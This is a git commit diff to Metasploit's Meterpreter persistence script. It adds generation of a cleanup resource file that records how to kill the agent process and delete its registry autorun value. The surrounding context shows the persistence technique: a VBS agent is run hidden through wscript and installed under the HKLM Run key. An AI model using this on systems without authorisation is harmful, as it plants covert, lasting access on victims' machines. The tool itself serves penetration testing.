Added auto generation of cleanup scrit to persistance Meterpreter script
git-svn-id: file:///home/svn/framework3/trunk@9190 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5bc9a572e6
commit
f6f88e90dc
|
@ -50,6 +50,29 @@ opts.parse(args) do |opt, idx, val|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
host_name = client.sys.config.sysinfo['Computer']
|
||||||
|
# Create Filename info to be appended to downloaded files
|
||||||
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
||||||
|
|
||||||
|
# Create a directory for the logs
|
||||||
|
logs = ::File.join(Msf::Config.log_directory, 'persistence', host_name + filenameinfo )
|
||||||
|
|
||||||
|
# Create the log directory
|
||||||
|
::FileUtils.mkdir_p(logs)
|
||||||
|
|
||||||
|
# Cleaup script file name
|
||||||
|
dest = logs + "/clean_up_" + filenameinfo + ".rc"
|
||||||
|
|
||||||
|
#Writes a given string to a file specified
|
||||||
|
def fs_filewrt(file2wrt, data2wrt)
|
||||||
|
output = ::File.open(file2wrt, "a")
|
||||||
|
if data2wrt
|
||||||
|
data2wrt.each_line do |d|
|
||||||
|
output.puts(d)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
output.close
|
||||||
|
end
|
||||||
#
|
#
|
||||||
# Create the persistent VBS
|
# Create the persistent VBS
|
||||||
#
|
#
|
||||||
|
@ -81,7 +104,7 @@ print_status("Uploaded the persistent agent to #{tempvbs}")
|
||||||
#
|
#
|
||||||
proc = session.sys.process.execute("wscript \"#{tempvbs}\"", nil, {'Hidden' => true})
|
proc = session.sys.process.execute("wscript \"#{tempvbs}\"", nil, {'Hidden' => true})
|
||||||
print_status("Agent executed with PID #{proc.pid}")
|
print_status("Agent executed with PID #{proc.pid}")
|
||||||
|
fs_filewrt(dest, "kill #{proc.pid}\n")
|
||||||
#
|
#
|
||||||
# Setup the multi/handler if requested
|
# Setup the multi/handler if requested
|
||||||
#
|
#
|
||||||
|
@ -110,8 +133,9 @@ if(install)
|
||||||
if(key)
|
if(key)
|
||||||
key.set_value(nam, session.sys.registry.type2str("REG_SZ"), tempvbs)
|
key.set_value(nam, session.sys.registry.type2str("REG_SZ"), tempvbs)
|
||||||
print_status("Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
print_status("Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
||||||
|
fs_filewrt(dest, "reg deleteval -k \'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\' -v #{nam}\n")
|
||||||
else
|
else
|
||||||
print_status("Error: failed to open the registry key for writing")
|
print_status("Error: failed to open the registry key for writing")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
print_status("For cleanup use command: run multi_console_command -s #{dest}")
|
||||||
|
|
Loading…
Reference in New Issue